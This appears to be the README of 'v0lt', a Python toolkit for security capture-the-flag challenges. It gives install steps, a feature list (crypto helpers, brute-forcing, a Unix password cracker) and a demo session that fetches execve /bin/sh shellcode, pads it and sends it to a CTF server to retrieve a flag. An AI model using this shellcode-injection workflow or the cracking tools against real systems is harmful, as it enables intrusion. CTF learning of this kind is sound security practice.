Security CTF Toy Tools - v0lt





v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:
  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

......
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
......

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:
  • Crypto
    • Base64
    • Ceasar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (Dictionnary, custom word)
  • Shellcodes
    • Shellcode selection and download from Shell-storm repo
    • Shellcode formater
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding
  • Easy connection support
    • Netcat
    • Telnet
And more Examples are available here

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3
  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2
  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0
  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree